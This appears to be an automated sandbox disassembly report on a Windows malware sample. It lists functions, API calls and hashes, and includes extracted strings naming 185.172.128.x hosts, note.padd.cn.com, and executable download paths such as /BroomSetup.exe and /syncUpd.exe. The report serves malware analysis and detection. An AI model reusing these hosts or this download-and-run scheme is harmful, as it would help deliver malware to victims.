std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05BF0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,05BF0223,?,?), ref: 05BF0E19
SetErrorMode.KERNEL32(00000000,?,?,05BF0223,?,?), ref: 05BF0E1E

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4a9121e4ead524d7902854725cdf5aa84acc24203c893d20774bc4890e9a15e9
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: BDD0123154512CB7D7003A94DC0DBCD7B1CDF09B62F008051FB0ED9481C770954047E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00409967

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
Opcode Fuzzy Hash: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 04195895 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 041958E6

Memory Dump Source

Source File: 00000000.00000002.1991857381.0000000004195000.00000040.00000020.00020000.00000000.sdmp, Offset: 04195000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4195000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: bf0adf162dc83efb020142d8bd70c4a0e6eea6f4e4df87262ae3903c3795b908
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: CC113C79A00208FFDB01DF98C985E98BBF5AF08351F058094F948AB362D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05C14C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 05C16823: __EH_prolog.LIBCMT ref: 05C16828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 05C14D3B

Part of subcall function 05C162B1: __EH_prolog.LIBCMT ref: 05C162B6
Part of subcall function 05C162B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05C16398

Strings

185.172.128.228, xrefs: 05C15F88, 05C16034, 05C16139
P, xrefs: 05C1575C
P, xrefs: 05C15312
185.172.128.90, xrefs: 05C1521A, 05C152B4, 05C15302
185.172.128.203, xrefs: 05C1585E, 05C15904, 05C15AA6
\run.exe, xrefs: 05C15E37, 05C15E8F
185.172.128.228, xrefs: 05C15527, 05C155CD, 05C1574C
.zip, xrefs: 05C15DC4, 05C15DE6
.exe, xrefs: 05C15B18, 05C15B3A
SOFTWARE\BroomCleaner, xrefs: 05C15358, 05C1544C
P, xrefs: 05C15ABC
P, xrefs: 05C15D77
/BroomSetup.exe, xrefs: 05C1604E, 05C160F4, 05C16142
iC, xrefs: 05C15E24
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 05C1501D, 05C151B3, 05C151CC
/1/Package.zip, xrefs: 05C15C7B, 05C15D15, 05C15D6F
@, xrefs: 05C14CE3
Installed, xrefs: 05C15466, 05C154C4
/timeSync.exe, xrefs: 05C159C6, 05C15A59, 05C15AC7
/ping.php?substr=%s, xrefs: 05C155EE, 05C156C4, 05C156DC
/syncUpd.exe, xrefs: 05C15923, 05C159A5, 05C15AD6
.exe, xrefs: 05C1618D, 05C161AF
note.padd.cn.com, xrefs: 05C15BA9, 05C15C61, 05C15D66
185.172.128.59, xrefs: 05C157A3, 05C1583D, 05C15AB4
P, xrefs: 05C1614A

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: aed7187130617f54b4b73a9ed0fcf54e95466f41f3ccd7bba9d01f68f2e31fed
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: 94A2111060F2D0BEC711B77C985A6CE6BE09B63240F54B8E9C3A45B363DB65910CD7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32 ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48

Strings

,CUSA, xrefs: 004208D0

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA
API String ID: 745075371-2978500865
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042140C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421552

Strings

1#IND, xrefs: 0042274A
1#QNAN, xrefs: 00422758
1#INF, xrefs: 0042275F
1#SNAN, xrefs: 00422751

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156

Strings

,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA
API String ID: 4212172061-2978500865
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
GetACP.KERNEL32 ref: 0042076E

Strings

OCP, xrefs: 004206EB
ACP, xrefs: 004206B5

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 05C108FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 05C10997
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 05C109C0
GetACP.KERNEL32 ref: 05C109D5

Strings

ACP, xrefs: 05C1091C
OCP, xrefs: 05C10952

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ea8db801173d3cf9b1e7baa8987007a429cea49c3753d2330e44d4934ed9748f
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: E121A622704104ABF7309F55C929BA772A7BB46A60F468C65ED4BF7200E722DB80D7D8

Uniqueness

Uniqueness Score: -1.00%

Function 05C10AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FDF
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FEC

GetUserDefaultLCID.KERNEL32 ref: 05C10BDE
IsValidCodePage.KERNEL32(00000000), ref: 05C10C39
IsValidLocale.KERNEL32(?,00000001), ref: 05C10C48
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 05C10C90
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 05C10CAF

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 8d7727eda819c6cf52e1f8e499f3401571f5968ff58bf78a6e632fba39107a6b
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 3D51A571A04219ABDF20DFA5CD48ABE73B8FF06704F044965ED05F7190DBB09A84EB69

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544
y%B, xrefs: 00412808, 004125F2, 00412481

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 05C1019A Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

IsValidCodePage.KERNEL32(00000000), ref: 05C1027C
_wcschr.LIBVCRUNTIME ref: 05C1030C
_wcschr.LIBVCRUNTIME ref: 05C1031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 05C103BD

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: d972bfdb9e2d471af56b7e5f35085dcfffdb9e7c3aa83369979fb71305ea51ac
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 6461FA71704206ABD724EB75CC4DFB673A8FF06310F545869ED06EB180EA74E684A798

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
